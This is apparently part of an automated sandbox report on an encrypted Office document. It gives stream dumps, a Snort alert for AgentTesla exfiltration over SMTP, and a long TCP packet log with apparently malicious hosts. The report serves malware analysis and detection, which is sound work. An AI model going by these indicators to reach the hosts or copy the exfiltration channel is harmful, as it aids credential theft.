Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 372360

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	372360
Entropy:	7.99934422624
Base64 Encoded:	True
Data ASCII:	} . . . . . . . . B z J 6 . . . . . . n . . . . . n s . F q . . p 3 . O B 7 . . G . . . R G p . . * . . . j . . . . . ( 6 . p o I . . . . L y . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . . . \| . & . . . . . r . . . ' . .
Data Raw:	7d ae 05 00 00 00 00 00 c2 42 7a 4a 36 9f d2 19 ca ce 88 6e ca 03 1e 01 e5 6e 73 00 46 71 db de 70 33 88 4f 42 37 e3 e3 47 f2 e2 fc 52 47 70 d9 9b 2a db 10 df 6a e6 c3 1a bd eb 28 36 c3 70 6f 49 0c db b7 a6 4c 79 1a 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6 1b 7c d0 26 85 8f c2 8c 81 72 0e f6 af 27 bd c6

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.49739252472
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . H S . . > . . . . . . . . { 5 F . \| e . . . . + q . . . . . . . . + % s . . . . C ? . k . . . , B L . . . 3 f . . . . . F 3 i J
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-11:36:32.655479	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49166	587	192.168.2.22	208.91.199.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 11:34:49.508043051 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.644728899 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.644813061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.645109892 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.782322884 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.782351017 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.782362938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.782378912 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.782480001 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.917784929 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917829990 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917850971 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917876959 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917897940 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917920113 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917943001 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917967081 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:49.917989016 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.918010950 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:49.918013096 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053291082 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053330898 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053347111 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053368092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053402901 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053426027 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053452969 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053479910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053508043 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053529978 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053545952 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053551912 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053575039 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053581953 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053586960 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053591013 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053594112 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053597927 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053601980 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053618908 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053627968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053648949 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053651094 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053659916 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053674936 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.053702116 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.053709984 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.055596113 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.188965082 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.188994884 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189009905 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189026117 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189042091 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189050913 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189058065 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189071894 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189074993 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189074993 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189090014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189094067 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189102888 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189111948 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189127922 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189145088 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189151049 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189161062 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189165115 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189177036 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189177990 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189191103 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189193010 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189207077 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189209938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189222097 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189229965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189237118 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189246893 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189259052 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189263105 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189274073 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189280033 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189290047 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189296007 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189306021 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189311028 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189327002 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189327002 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189337969 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189342022 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189352989 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189361095 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189378023 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189403057 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189408064 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189409971 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189429045 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189445019 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189461946 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189465046 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189476967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189477921 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189492941 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189492941 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189507961 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189508915 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.189521074 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.189536095 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.191009045 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327235937 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327267885 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327280045 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327296019 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327315092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327332020 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327347040 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327363968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327380896 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327397108 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327413082 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327413082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327430010 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327434063 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327435970 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327444077 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327450991 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327481031 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327497959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327506065 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327506065 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327522993 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327524900 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327534914 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327547073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327564001 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327574968 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327591896 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327595949 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327604055 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327615976 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327620983 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327627897 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327627897 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327645063 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327645063 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327657938 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327673912 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327675104 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327688932 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327689886 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327696085 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327704906 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327717066 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327721119 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327735901 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327740908 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327749014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327755928 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327771902 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327786922 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327792883 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327797890 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327801943 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327805042 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327816010 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327817917 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327827930 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327832937 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327847958 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327848911 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327862024 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327869892 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327877998 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327882051 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327893019 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327898979 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327913046 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327936888 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327951908 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327965975 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327975988 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327981949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327987909 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.327997923 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.327999115 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.328010082 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.328016996 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.328027964 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.329283953 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.329309940 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.336817026 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.464709044 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464767933 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464816093 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464857101 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464894056 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464898109 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.464922905 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.464931965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.464943886 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.464968920 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.464968920 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.465006113 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.465043068 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468023062 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468142033 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468221903 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468266010 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468271971 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468308926 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468312025 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468347073 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468383074 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468388081 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468430042 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468471050 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468472958 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468511105 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468548059 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468549013 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468584061 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468586922 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468622923 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468657017 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468660116 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468697071 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468700886 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468732119 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468744040 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468784094 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468786955 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468822956 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468823910 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468861103 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468863964 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468899012 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468903065 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468939066 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468939066 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.468975067 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.468977928 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469016075 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469062090 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469089985 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469104052 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469105959 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469141006 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469153881 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469181061 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469182014 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469219923 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469254971 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469265938 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469293118 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469330072 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469341993 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469367981 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469377041 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469444036 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469464064 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469494104 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469496965 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469532967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469569921 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469582081 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469608068 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469619989 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469645023 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469646931 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.469682932 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.469727993 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.473711967 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.475564957 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.475703001 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.608767033 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.608845949 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.608901978 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.608951092 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.608985901 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.608999014 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609009027 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609011889 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609045029 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609054089 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609108925 CEST	49165	80	192.168.2.22	198.23.213.61
Apr 12, 2021 11:34:50.609157085 CEST	80	49165	198.23.213.61	192.168.2.22
Apr 12, 2021 11:34:50.609210014 CEST	49165	80	192.168.2.22	198.23.213.61
